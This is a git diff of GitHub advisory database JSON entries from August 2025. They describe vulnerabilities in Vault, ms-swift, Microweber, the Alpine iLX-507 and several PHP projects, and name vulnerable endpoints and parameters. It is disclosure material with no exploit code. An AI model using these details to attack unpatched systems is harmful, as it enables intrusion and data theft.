b/advisories/unreviewed/2025/08/GHSA-fjwp-5xr6-hvh5/GHSA-fjwp-5xr6-hvh5.json new file mode 100644 index 0000000000000..6f982c87c60af --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-fjwp-5xr6-hvh5/GHSA-fjwp-5xr6-hvh5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjwp-5xr6-hvh5", + "modified": "2025-08-01T18:31:20Z", + "published": "2025-08-01T18:31:20Z", + "aliases": [ + "CVE-2025-8476" + ], + "details": "Alpine iLX-507 TIDAL Improper Certificate Validation Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Alpine iLX-507 devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the TIDAL music streaming application. The issue results from improper certificate validation. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-26322.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8476" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-765" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-fmhj-j6r9-5m2p/GHSA-fmhj-j6r9-5m2p.json b/advisories/unreviewed/2025/08/GHSA-fmhj-j6r9-5m2p/GHSA-fmhj-j6r9-5m2p.json new file mode 100644 index 0000000000000..14d953be74e7f --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-fmhj-j6r9-5m2p/GHSA-fmhj-j6r9-5m2p.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmhj-j6r9-5m2p", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-50870" + ], + "details": "Institute-of-Current-Students 1.0 is vulnerable to Incorrect Access Control in the mydetailsstudent.php endpoint. The myds GET parameter accepts an email address as input and directly returns the corresponding student's personal information without validating the identity or permissions of the requesting user. This allows any authenticated or unauthenticated attacker to enumerate and retrieve sensitive student details by altering the email value in the request URL, leading to information disclosure.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50870" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/284.html" + }, + { + "type": "WEB", + "url": "https://gist.github.com/b0mk35h/c4d47b5c4aacecdc8e6c4b02b40ce302" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-fmp3-xxcc-559c/GHSA-fmp3-xxcc-559c.json b/advisories/unreviewed/2025/08/GHSA-fmp3-xxcc-559c/GHSA-fmp3-xxcc-559c.json new file mode 100644 index 0000000000000..9c46abdab4de6 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-fmp3-xxcc-559c/GHSA-fmp3-xxcc-559c.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fmp3-xxcc-559c", + "modified": "2025-08-01T18:31:18Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2023-32256" + ], + "details": "A flaw was found in the Linux kernel's ksmbd component. A race condition between smb2 close operation and logoff in multichannel connections could result in a use-after-free issue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32256" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-32256" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2385885" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=abcc506a9a71976a8b4c9bf3ee6efd13229c1e19" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-23-704" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-421" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-h64g-vgvx-2m8r/GHSA-h64g-vgvx-2m8r.json b/advisories/unreviewed/2025/08/GHSA-h64g-vgvx-2m8r/GHSA-h64g-vgvx-2m8r.json new file mode 100644 index 0000000000000..436bdb9610c0f --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-h64g-vgvx-2m8r/GHSA-h64g-vgvx-2m8r.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h64g-vgvx-2m8r", + "modified": "2025-08-01T18:31:17Z", + "published": "2025-08-01T18:31:17Z", + "aliases": [ + "CVE-2025-52361" + ], + "details": "Insecure permissions in the script /etc/init.d/lighttpd in AK-Nord USB-Server-LXL Firmware v0.0.16 Build 2023-03-13 allows a locally authenticated low-privilege user to execute arbitrary commands with root privilege via editing this script which is executed with root-privileges on any interaction and on every system boot.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52361" + }, + { + "type": "WEB", + "url": "https://seclists.org/fulldisclosure/2025/Jul/20" + }, + { + "type": "WEB", + "url": "https://www.ak-nord.de/usbserver-usb--usb-converter--usb-auf-ethernet--usb-to-ethernet--usb-auf-lan--usb-server--usb-konverter--print-server-80.html" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T16:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-j7gx-cwm7-5mxg/GHSA-j7gx-cwm7-5mxg.json b/advisories/unreviewed/2025/08/GHSA-j7gx-cwm7-5mxg/GHSA-j7gx-cwm7-5mxg.json new file mode 100644 index 0000000000000..ab311cfe10cf6 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-j7gx-cwm7-5mxg/GHSA-j7gx-cwm7-5mxg.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j7gx-cwm7-5mxg", + "modified": "2025-08-01T18:31:16Z", + "published": "2025-08-01T18:31:16Z", + "aliases": [ + "CVE-2019-19144" + ], + "details": "XML External Entity Injection vulnerability in Quantum DXi6702 2.3.0.3 (11449-53631 Build304) devices via rest/Users?action=authenticate.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19144" + }, + { + "type": "WEB", + "url": "https://github.com/atredispartners/advisories/blob/master/ATREDIS-2019-0004.md" + }, + { + "type": "WEB", + "url": "https://www.quantum.com/products/disk-basedbackup/dxi6700/index.aspx" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T16:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-m523-xm42-q7ff/GHSA-m523-xm42-q7ff.json b/advisories/unreviewed/2025/08/GHSA-m523-xm42-q7ff/GHSA-m523-xm42-q7ff.json index 3c90718f0af03..3b939a3c989cc 100644 --- a/advisories/unreviewed/2025/08/GHSA-m523-xm42-q7ff/GHSA-m523-xm42-q7ff.json +++ b/advisories/unreviewed/2025/08/GHSA-m523-xm42-q7ff/GHSA-m523-xm42-q7ff.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m523-xm42-q7ff", - "modified": "2025-08-01T15:34:18Z", + "modified": "2025-08-01T18:31:16Z", "published": "2025-08-01T15:34:18Z", "aliases": [ "CVE-2025-45767" ], "details": "jose v6.0.10 was discovered to contain weak encryption.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-327" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-08-01T15:15:32Z" diff --git a/advisories/unreviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json b/advisories/unreviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json new file mode 100644 index 0000000000000..a972b0227cabe --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mr4h-qf9j-f665/GHSA-mr4h-qf9j-f665.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mr4h-qf9j-f665", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-6000" + ], + "details": "A privileged Vault operator within the root namespace with write permission to {{sys/audit}} may obtain code execution on the underlying host if a plugin directory is set in Vault’s configuration. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6000" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2025-14-privileged-vault-operator-may-execute-code-on-the-underlying-host/76033" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json b/advisories/unreviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json new file mode 100644 index 0000000000000..21440848ba900 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mvj3-hc7j-vp74/GHSA-mvj3-hc7j-vp74.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvj3-hc7j-vp74", + "modified": "2025-08-01T18:31:18Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-51502" + ], + "details": "Reflected Cross-Site Scripting (XSS) in Microweber CMS 2.0 via the layout parameter on the /admin/page/create page allows arbitrary JavaScript execution in the context of authenticated admin users.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51502" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51502" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/MICROWEBER%20%5BAdmin%20Panel%5D%20Reflected%20XSS%20on%20layout%20parameter.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json b/advisories/unreviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json new file mode 100644 index 0000000000000..dca3846f77a78 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mwgr-84fv-3jh9/GHSA-mwgr-84fv-3jh9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwgr-84fv-3jh9", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-6011" + ], + "details": "A timing side channel in Vault and Vault Enterprise’s (“Vault”) userpass auth method allowed an attacker to distinguish between existing and non-existing users, and potentially enumerate valid usernames for Vault’s Userpass auth method. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6011" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2025-15-timing-side-channel-in-vault-s-userpass-auth-method/76034" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mxg3-45rj-wpf7/GHSA-mxg3-45rj-wpf7.json b/advisories/unreviewed/2025/08/GHSA-mxg3-45rj-wpf7/GHSA-mxg3-45rj-wpf7.json new file mode 100644 index 0000000000000..8fd59951ff4df --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mxg3-45rj-wpf7/GHSA-mxg3-45rj-wpf7.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mxg3-45rj-wpf7", + "modified": "2025-08-01T18:31:17Z", + "published": "2025-08-01T18:31:17Z", + "aliases": [ + "CVE-2025-45778" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in The Language Sloth Web Application v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Description text field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45778" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/206262" + }, + { + "type": "WEB", + "url": "http://language.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-p3q2-74hc-43v3/GHSA-p3q2-74hc-43v3.json b/advisories/unreviewed/2025/08/GHSA-p3q2-74hc-43v3/GHSA-p3q2-74hc-43v3.json new file mode 100644 index 0000000000000..83f61f0b31119 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-p3q2-74hc-43v3/GHSA-p3q2-74hc-43v3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p3q2-74hc-43v3", + "modified": "2025-08-01T18:31:18Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-2824" + ], + "details": "IBM Operational Decision Manager 8.11.0.1, 8.11.1.0, 8.12.0.1, 9.0.0.1, and 9.5.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2824" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7241286" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-q2v9-7453-3jwf/GHSA-q2v9-7453-3jwf.json b/advisories/unreviewed/2025/08/GHSA-q2v9-7453-3jwf/GHSA-q2v9-7453-3jwf.json new file mode 100644 index 0000000000000..28eb69807a09a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-q2v9-7453-3jwf/GHSA-q2v9-7453-3jwf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2v9-7453-3jwf", + "modified": "2025-08-01T18:31:17Z", + "published": "2025-08-01T18:31:16Z", + "aliases": [ + "CVE-2025-44139" + ], + "details": "Emlog Pro V2.5.7 is vulnerable to Unrestricted Upload of File with Dangerous Type via /emlog/admin/plugin.php?action=upload_zip", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-44139" + }, + { + "type": "WEB", + "url": "https://gist.github.com/babapihai/b56121e0b2694e2be22571057d05298e" + }, + { + "type": "WEB", + "url": "http://emlog.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T16:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-q8q3-6g93-33hh/GHSA-q8q3-6g93-33hh.json b/advisories/unreviewed/2025/08/GHSA-q8q3-6g93-33hh/GHSA-q8q3-6g93-33hh.json new file mode 100644 index 0000000000000..a1d12ddc9b97e --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-q8q3-6g93-33hh/GHSA-q8q3-6g93-33hh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8q3-6g93-33hh", + "modified": "2025-08-01T18:31:18Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-50868" + ], + "details": "A SQL Injection vulnerability exists in the takeassessment2.php file of CloudClassroom-PHP-Project 1.0. The Q4 POST parameter is not properly sanitized before being used in SQL queries.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50868" + }, + { + "type": "WEB", + "url": "https://gist.github.com/b0mk35h/393a5491ef82fe0ede9207e4bc5953fb" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json b/advisories/unreviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json new file mode 100644 index 0000000000000..9fd68224f40e8 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-qgj7-fmq2-6cc4/GHSA-qgj7-fmq2-6cc4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qgj7-fmq2-6cc4", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-6004" + ], + "details": "Vault and Vault Enterprise’s (“Vault”) user lockout feature could be bypassed for Userpass and LDAP authentication methods. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6004" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2025-16-vault-userpass-and-ldap-user-lockout-bypass/76035" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-307" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-qgm9-fp3r-vm5v/GHSA-qgm9-fp3r-vm5v.json b/advisories/unreviewed/2025/08/GHSA-qgm9-fp3r-vm5v/GHSA-qgm9-fp3r-vm5v.json new file mode 100644 index 0000000000000..d09014c6c7acb --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-qgm9-fp3r-vm5v/GHSA-qgm9-fp3r-vm5v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qgm9-fp3r-vm5v", + "modified": "2025-08-01T18:31:17Z", + "published": "2025-08-01T18:31:17Z", + "aliases": [ + "CVE-2025-50472" + ], + "details": "The modelscope/ms-swift library thru 2.6.1 is vulnerable to arbitrary code execution through deserialization of untrusted data within the `load_model_meta()` function of the `ModelFileSystemCache()` class. Attackers can execute arbitrary code and commands by crafting a malicious serialized `.mdl` payload, exploiting the use of `pickle.load()` on data from potentially untrusted sources. This vulnerability allows for remote code execution (RCE) by deceiving victims into loading a seemingly harmless checkpoint during a normal training process, thereby enabling attackers to execute arbitrary code on the targeted machine. Note that the payload file is a hidden file, making it difficult for the victim to detect tampering. More importantly, during the model training process, after the `.mdl` file is loaded and executes arbitrary code, the normal training process remains unaffected'meaning the user remains unaware of the arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50472" + }, + { + "type": "WEB", + "url": "https://github.com/modelscope/ms-swift/blob/ab38bff0387a86fd9f068246c326ee7b0d5ed139/swift/hub/utils/caching.py#L141" + }, + { + "type": "WEB", + "url": "https://github.com/xhjy2020/CVE-2025-50472" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T16:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-qh7w-62mf-364r/GHSA-qh7w-62mf-364r.json b/advisories/unreviewed/2025/08/GHSA-qh7w-62mf-364r/GHSA-qh7w-62mf-364r.json new file mode 100644 index 0000000000000..e923e9689ab62 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-qh7w-62mf-364r/GHSA-qh7w-62mf-364r.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qh7w-62mf-364r", + "modified": "2025-08-01T18:31:18Z", + "published": "2025-08-01T18:31:18Z", + "aliases": [ + "CVE-2025-50869" + ], + "details": "A stored Cross-Site Scripting (XSS) vulnerability exists in the qureydetails.php page of Institute-of-Current-Students 1.0, where the input fields for Query and Answer do not properly sanitize user input. Authenticated users can inject arbitrary JavaScript code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50869" + }, + { + "type": "WEB", + "url": "https://gist.github.com/b0mk35h/1fabbff8c95c6b7180c4ef404a337b8b" + }, + { + "type": "WEB", + "url": "https://portswigger.net/web-security/cross-site-scripting/stored" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json b/advisories/unreviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json new file mode 100644 index 0000000000000..33e4651184b3f --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-qv3p-fmv3-9hww/GHSA-qv3p-fmv3-9hww.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qv3p-fmv3-9hww", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-6014" + ], + "details": "Vault and Vault Enterprise’s (“Vault”) TOTP Secrets Engine code validation endpoint is susceptible to code reuse within its validity period. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6014" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2025-17-vault-totp-secrets-engine-code-reuse/76036" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-156" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T18:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-rpv2-rq4j-p9m3/GHSA-rpv2-rq4j-p9m3.json b/advisories/unreviewed/2025/08/GHSA-rpv2-rq4j-p9m3/GHSA-rpv2-rq4j-p9m3.json new file mode 100644 index 0000000000000..dce4790b00f09 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-rpv2-rq4j-p9m3/GHSA-rpv2-rq4j-p9m3.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpv2-rq4j-p9m3", + "modified": "2025-08-01T18:31:17Z", + "published": "2025-08-01T18:31:17Z", + "aliases": [ + "CVE-2025-52327" + ], + "details": "SQL Injection vulnerability in Restaurant Order System 1.0 allows a local attacker to obtain sensitive information via the payment.php file", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52327" + }, + { + "type": "WEB", + "url": "https://code-projects.org/real-estate-property-management-system-php-source-code" + }, + { + "type": "WEB", + "url": "https://gist.github.com/babapihai/d604a43d884a9e20c234f33865584db4" + }, + { + "type": "WEB", + "url": "http://restaurant.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T16:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-v6qp-r53v-fvh5/GHSA-v6qp-r53v-fvh5.json b/advisories/unreviewed/2025/08/GHSA-v6qp-r53v-fvh5/GHSA-v6qp-r53v-fvh5.json index 2573bf73e7f53..628560e31631d 100644 --- a/advisories/unreviewed/2025/08/GHSA-v6qp-r53v-fvh5/GHSA-v6qp-r53v-fvh5.json +++ b/advisories/unreviewed/2025/08/GHSA-v6qp-r53v-fvh5/GHSA-v6qp-r53v-fvh5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v6qp-r53v-fvh5", - "modified": "2025-08-01T15:34:18Z", + "modified": "2025-08-01T18:31:16Z", "published": "2025-08-01T15:34:18Z", "aliases": [ "CVE-2025-46018" ], "details": "CSC Pay Mobile App 2.19.4 (fixed in version 2.20.0) contains a vulnerability allowing users to bypass payment authorization by disabling Bluetooth at a specific point during a transaction. This could result in unauthorized use of laundry services and potential financial loss.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-290" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-08-01T14:15:35Z" diff --git a/advisories/unreviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json b/advisories/unreviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json new file mode 100644 index 0000000000000..f7e8ba84d6452 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-v6r4-35f9-9rpw/GHSA-v6r4-35f9-9rpw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6r4-35f9-9rpw", + "modified": "2025-08-01T18:31:19Z", + "published": "2025-08-01T18:31:19Z", + "aliases": [ + "CVE-2025-6015" + ], + "details": "Vault and Vault Enterprise’s (“Vault”) login MFA rate limits could be bypassed and TOTP tokens could be reused. Fixed in Vault Community Edition 1.20.1 and Vault Enterprise 1.20.1, 1.19.7, 1.18.12, and 1.16.23.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6015" + }, + { + "type": "WEB", + "url": 